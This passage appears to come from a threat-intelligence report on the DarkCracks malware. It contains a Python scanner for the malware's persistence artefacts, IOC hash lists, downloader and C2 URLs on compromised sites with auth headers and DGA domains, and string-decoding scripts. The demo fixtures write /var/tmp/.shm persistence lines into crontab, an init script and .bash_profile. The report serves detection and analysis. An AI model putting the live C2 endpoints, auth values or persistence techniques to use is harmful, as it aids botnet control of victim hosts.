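    "2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1",  # Runner config (SH3 field)
    "9d8dadaf-6c7e-4975-b26d-ec17e67493c6",  # Launcher core config
}
INIT_SCRIPT = os.path.join("etc", "init.d", "rnd")
UUID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")


def scan_host(root="/", crontab_lines=(), profiles=()):
    """Return (kind, detail) findings for DarkCracks artefacts under `root`.

    crontab_lines: lines of `crontab -l` output, passed in so the check runs offline.
    profiles: paths of .bash_profile files to inspect.
    Matching persistence entries by a reference to ".shm" is an assumption; the
    article does not show the exact line the Runner writes.
    """
    findings = []
    shm = os.path.join(root, WORK_DIR)
    if os.path.isdir(shm):
        findings.append(("workdir", shm))
        for name in sorted(os.listdir(shm)):
            path = os.path.join(shm, name)
            if name in KNOWN_BLOBS:
                findings.append(("known-config-blob", path))
            elif UUID_RE.match(name):
                findings.append(("uuid-named-file", path))
    init_script = os.path.join(root, INIT_SCRIPT)
    if os.path.isfile(init_script):
        findings.append(("init-script", init_script))
    for line in crontab_lines:
        if ".shm" in line:
            findings.append(("crontab-entry", line.strip()))
    for profile in profiles:
        if not os.path.isfile(profile):
            continue
        with open(profile, encoding="utf-8", errors="replace") as fh:
            if any(".shm" in line for line in fh):
                findings.append(("bash-profile-entry", profile))
    return findings


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def build_demo_tree(base):
    """Lay out a constructed infected-host image under `base`; returns the profile path."""
    runner = "6f1c2a3e-1111-4aaa-8bbb-0123456789ab"  # constructed UUID standing in for the renamed Runner
    _write(os.path.join(base, WORK_DIR, "2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1"), "")
    _write(os.path.join(base, WORK_DIR, runner), "")
    _write(os.path.join(base, INIT_SCRIPT), "#!/bin/sh\n/var/tmp/.shm/%s\n" % runner)
    profile = os.path.join(base, "home", "user", ".bash_profile")
    _write(profile, "/var/tmp/.shm/%s &\n" % runner)
    return profile


def run_demo():
    """Build the constructed tree in a temp dir, scan it, and return the sorted finding kinds."""
    base = tempfile.mkdtemp(prefix="darkcracks-demo-")
    profile = build_demo_tree(base)
    crontab = ["@reboot /var/tmp/.shm/6f1c2a3e-1111-4aaa-8bbb-0123456789ab"]  # constructed
    findings = scan_host(base, crontab_lines=crontab, profiles=[profile])
    return sorted({kind for kind, _ in findings})


if __name__ == "__main__":
    for kind in run_demo():
        print(kind)
```

On a live system, call scan_host("/", crontab_lines=subprocess output of `crontab -l`, profiles=[every /home/*/.bash_profile and /root/.bash_profile]); a hit on the working directory alone is worth treating as an incident, since the path is not used by anything legitimate.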
This is the extent of our current knowledge of DarkCracks. Our analysis reflects our own perspective and is undoubtedly limited. We invite other industry experts with unique insights to contribute additional information and help us refine the profile of DarkCracks. If you are interested in our research, you can also contact us via the X platform for more details.

## IOC

### MD5

#### Runner

```
c30e9934299fd43527834086b6cfa26a *pQ1iM9hd-armv5-uclibc
8c53e98685fc3ce8b86055991b905926 *pQ1iM9hd-armv6-gnu
257c9ec1241b3fa59565edec9689276b *pQ1iM9hd-armv8-gnu
281e4ede8ffc0f854ce671b5b3ae06f8 *pQ1iM9hd-mips-uclibc
21732589b41506e1e7de87d7066ea43e *pQ1iM9hd-mipsel-uclibc
93a7cba1edbacb633021ebc38c10a79f *pQ1iM9hd-x64
036d6c73fe7a568160f3de8a98d0a58b *pQ1iM9hd-x64-musl
5340ee724893fd596852f22ecbc3e795 *pQ1iM9hd-x86
c6909b8b8bc55fac85c5fe650c7df42a *wk8dnj2k-armv5-uclibc
227d19736af70bef817da96668994af8 *wk8dnj2k-armv6-gnu
a18957196842c78cbce2247d766712ad *wk8dnj2k-armv8-gnu
0dd9e350aafe0d1c9e619d27ebd2ccfd *wk8dnj2k-mips-uclibc
8859d9b1c3f41b9dad3cee68adaddd92 *wk8dnj2k-mipsel-uclibc
93a7cba1edbacb633021ebc38c10a79f *wk8dnj2k-x64
e587cd53059f58526be7e2167cf7177b *wk8dnj2k-x64-musl
5340ee724893fd596852f22ecbc3e795 *wk8dnj2k-x86
```

#### Client

```
af93dc3d635ed3b46439e38fae8ecf6b *mY5bJK7e-armv5-uclibc
b0f7df80d2adda176f8d58a55b773eed *mY5bJK7e-armv5-uclibc.decrypted
7d6ea278b5ae9081c03e340d6f98a4a5 *mY5bJK7e-armv6-gnu
635a7ae54cb7966d61e2e8f64391e870 *mY5bJK7e-armv6-gnu.decrypted
c1d07c102e436284d3fbce0410658ae8 *mY5bJK7e-armv8-gnu
11d4db491fe82e37ff0a5c3787cfa143 *mY5bJK7e-armv8-gnu.decrypted
4e64816a821ce2eb231a5be5395a2f20 *mY5bJK7e-mips-uclibc
2e7d67a3be72c5d1718fc2689c0d5d08 *mY5bJK7e-mips-uclibc.decrypted
5e9bf8a980bcc4d004ff505778b843e6 *mY5bJK7e-mipsel-uclibc
527cc24f043c58101c122c2a2f6c6d8e *mY5bJK7e-mipsel-uclibc.decrypted
5b39497af0d9874d38288476d3a9f5a4 *mY5bJK7e-x64
dffee792a8e65d38d897bd3400aecd3d *mY5bJK7e-x64.decrypted
7515282b084374d9d8b87e46b87e4af8 *mY5bJK7e-x64-musl
```
ee0d3c3c528034fa3ebdc37596014382 *mY5bJK7e-x64-musl.decrypted d41c379725973e97ef9cbafb1efdb2f3 *mY5bJK7e-x86 1d407ff91ce19afc82f7946c3ec24dea *mY5bJK7e-x86.decrypted a1f3e574799c3f874a8d3563dbc55f4c *se3hf6jwc-armv5-uclibc ad831d9c00c90fead925f4575f4a6a9a *se3hf6jwc-armv5-uclibc.decrypted 2b5df28714421d79ab3e63eac538d853 *se3hf6jwc-armv6-gnu 2107625e9980d190e3214ef09a83608f *se3hf6jwc-armv6-gnu.decrypted 35f846e24d0cccb5a3ec736c07f6a0a2 *se3hf6jwc-armv8-gnu 5fbe460fc8fa09dc6adc73e5e908cd0e *se3hf6jwc-armv8-gnu.decrypted 27f18a27942fbb71c4e84736db45b5cf *se3hf6jwc-mips-uclibc e1674821a190f5250e6aba40916c9061 *se3hf6jwc-mips-uclibc.decrypted b1040f3193d4bec01b13bc73ecaa2587 *se3hf6jwc-mipsel-uclibc 7c33c052c5d451ba4069639286dfc4b5 *se3hf6jwc-mipsel-uclibc.decrypted 81eccc9c10368aa54cfed371f83da45a *se3hf6jwc-x64 fe5f484f71bf0fd7afa56e60da7eec6f *se3hf6jwc-x64.decrypted 08169e20daaad052075bd4026c8e287f *se3hf6jwc-x64-musl 2caf09452e79390f09bebf27dad9acf4 *se3hf6jwc-x64-musl.decrypted 5421bc92f2dd8f37538c2023c1e2f8ee *se3hf6jwc-x86 7168f47f067d260c34543e32a7a55cbd *se3hf6jwc-x86.decrypted Config 4e52426a96baf84431775adf2d6f0ae2 *j8UgL3v 4a642a86a8d8e71e5f163fa54eda9241 *qoakeifm-unknown.txt DOWNLOADER https://www.auntyaliceschool.site/wp-admin/maint/{se3hf6jwc|wk8dnj2k} http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/{mY5bJK7e|pQ1iM9hd} http://45.169.87.67/vendor/sabre/event/lib/Promise/{se3hf6jwc|wk8dnj2k} C2 (VICTIMS) http://187.190.1.137/vendor/guzzlehttp/guzzle/src/Exception/detail.php http://204.199.192.44/vendor/paragonie/sodium_compat/src/Core32/Poly25519.php http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php http://158.177.2.191/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php http://64.227.0.146/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php http://216.238.103.62:8013/vendor/guzzlehttp/guzzle/src/Exception/DNSException.php http://52.0.85.62/vendor/guzzlehttp/guzzle/src/Exception/detail.php 
https://www.miracles.com.hk/wp-content/plugins/foxiplugin/detail.php http://152.67.11.54/wordpress//wp-admin/includes/sus.php DGA C2 202301-202312 kTD7YgOAgjL.com gTD7YgOAgjL.com sTD7YgOAgjL.com EVD7YgOAgjL.com AVD7YgOAgjL.com MVD7YgOAgjL.com IVD7YgOAgjL.com UVD7YgOAgjL.com QVD7YgOAgjL.com YTC7YgOAgjL.com kTC7YgOAgjL.com gTC7YgOAgjL.com 202401- 202408 kTDFUgOAgjL.com gTDFUgOAgjL.com sTDFUgOAgjL.com EVDFUgOAgjL.com AVDFUgOAgjL.com MVDFUgOAgjL.com IVDFUgOAgjL.com UVDFUgOAgjL.com C2 216.74.123.97 United States|California|Los Angeles AS834|IPXO LLC 213.139.233.163 Japan|Osaka|Osaka AS34985|ASN block not managed by the RIPE NCC CONFIGS GITHUB Address: https://github[.]com/adrhpbrn29/sudoku1 {"url":"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"LJHRQWE","clientUrl":"http://45.169.87.67/vendor/sabre/event/lib/Promise/se3hf6jwc","runnerUrl":"http://45.169.87.67/vendor/sabre/event/lib/Promise/wk8dnj2k"} {"url":"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"LJHRQWE","clientUrl":"https://www.auntyaliceschool.site/wp-admin/maint/se3hf6jwc","runnerUrl":"https://www.auntyaliceschool.site/wp-admin/maint/wk8dnj2k"} {"url":"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"LJHRQWE"} {"url":"http://158.177.2.191/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"SLDJKFA"} {"url":"http://64.227.0.146/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"Linux Max"}' {"url":"http://216.238.103.62:8013/vendor/guzzlehttp/guzzle/src/Exception/DNSException.php","authHeader":"Rbz021g6"} PASTEBIN Address:https://pastebin[.]com/GYEBVyMR {"url":"http://52.0.85.62/vendor/guzzlehttp/guzzle/src/Exception/detail.php","authHeader":"GGSEDPHP","clientUrl":"http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/mY5bJK7e","runnerUrl":"http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd"} APPENDIX IDA 
SCRIPT # Install flare_emu first # Only test with 93a7cba1edbacb633021ebc38c10a79f # Modify 'decstr_addr' in in your case import flare_emu import base64 import string def decode(cipher): tmp = cipher[::-1] + b"=" * ((4 - len(cipher) % 4) ) out = bytearray() for i, v in enumerate(base64.urlsafe_b64decode(tmp)): cha = v ^ key[i % len(key)] if chr(cha) in string.ascii_letters: cha ^= 0x20 out.append(cha) out += b"=" * ((4 - len(out) % 4) % 4) return base64.urlsafe_b64decode(out) def iterateCallback(eh, address, argv, userData): ro=ida_segment.get_segm_by_name(".rodata") if ro.start_ea <= argv[0] <=ro.end_ea: buff=eh.getEmuString(argv[0]) if len(buff)>0: plain=decode(buff) print(hex(argv[0]),buff,"<==============>",plain) ida_bytes.put_bytes(argv[0],b'\x00'*len(buff)) ida_bytes.put_bytes(argv[0],plain) decstr_addr=0x0000FCD0 key=bytes.fromhex('43 72 61 63 6B 61 6C 61 63 6B 69 6E 27') eh=flare_emu.EmuHelper() eh.iterate(decstr_addr,iterateCallback) CYBERCHEF https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Hex','string':'2D%208C%207F%20EE%2042%20D3%20DB%204A%208E%2055%20FB%20FF%2065%2035%201E%201B'%7D,%7B'option':'Hex','string':'B8%20AD%20DB%20A8%20FC%20BD%200F%2085%20EE%201C%20A5%2003%203D%200D%20F3%2042'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D) Please enable JavaScript to view the comments powered by Disqus. 奇安信 X 实验室 © 2024 * RSS Powered by Ghost
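The string-decoding scheme that the IDA script drives through flare_emu, re-implemented stand-alone so it can be checked without IDA. This is an added example, not code from the XLab post or from any DarkCracks sample: only the key bytes come from the script above. It adds the inverse transform solely to construct test vectors, and mirrors the callback's in-place patching on a constructed byte buffer instead of a real .rodata segment. The sample strings and the buffer are constructed.

```python
# Added example: stand-alone re-implementation of the Runner string-decoding
# scheme from the IDA script, plus its inverse for building test vectors.
# Not the XLab post's code; only the key bytes are taken from the post.
import base64
import string

# Key as given in the post's IDA script (bytes 43 72 61 63 6B 61 6C 61 63 6B 69 6E 27)
KEY = bytes.fromhex("43 72 61 63 6B 61 6C 61 63 6B 69 6E 27")

_LETTERS = string.ascii_letters.encode()


def _pad(b64: bytes) -> bytes:
    """Restore the '=' padding that the obfuscated strings omit."""
    return b64 + b"=" * ((4 - len(b64) % 4) % 4)


def _flip_case(v: int) -> int:
    """Toggle bit 0x20 on ASCII letters (upper <-> lower); other bytes unchanged.
    The mapping is an involution on bytes, so it is its own inverse."""
    return v ^ 0x20 if v in _LETTERS else v


def decode(cipher: bytes, key: bytes = KEY) -> bytes:
    """Decode one obfuscated string exactly as the IDA script does:
    reverse -> urlsafe base64 decode -> XOR with repeating key -> case flip
    -> urlsafe base64 decode."""
    stage1 = base64.urlsafe_b64decode(_pad(cipher[::-1]))
    stage2 = bytes(_flip_case(v ^ key[i % len(key)]) for i, v in enumerate(stage1))
    return base64.urlsafe_b64decode(_pad(stage2))


def encode(plain: bytes, key: bytes = KEY) -> bytes:
    """Inverse of decode(); used here only to construct test data."""
    inner = base64.urlsafe_b64encode(plain).rstrip(b"=")
    stage1 = bytes(_flip_case(v) ^ key[i % len(key)] for i, v in enumerate(inner))
    return base64.urlsafe_b64encode(stage1).rstrip(b"=")[::-1]


def build_sample_rodata(strings):
    """Construct a fake .rodata image: NUL-terminated obfuscated strings back to back.
    Returns the buffer and the offset of each string (constructed data)."""
    buf = bytearray()
    offsets = []
    for s in strings:
        offsets.append(len(buf))
        buf += encode(s) + b"\x00"
    return buf, offsets


def decode_in_place(rodata: bytearray, offsets):
    """Mirror of the IDA callback without IDA: for each offset read the NUL-terminated
    ciphertext, decode it, zero the original bytes and write the plaintext over them
    (the plaintext is always shorter than the ciphertext, so it fits).
    Returns {offset: plaintext}."""
    results = {}
    for off in offsets:
        end = rodata.index(b"\x00", off)
        cipher = bytes(rodata[off:end])
        if not cipher:
            continue
        plain = decode(cipher)
        rodata[off:end] = b"\x00" * len(cipher)
        rodata[off:off + len(plain)] = plain
        results[off] = plain
    return results


if __name__ == "__main__":
    # Constructed sample strings (not taken from any DarkCracks binary)
    buf, offs = build_sample_rodata([b"sample-string-one", b"http://example.invalid/cfg"])
    for off, plain in decode_in_place(buf, offs).items():
        print(hex(off), plain)
```

Because the case flip is an involution and base64 encode/decode are inverses, `decode(encode(x))` returns `x` for any byte string, which is what makes the constructed buffer a reliable check of the decoder before pointing the IDA script at a real sample.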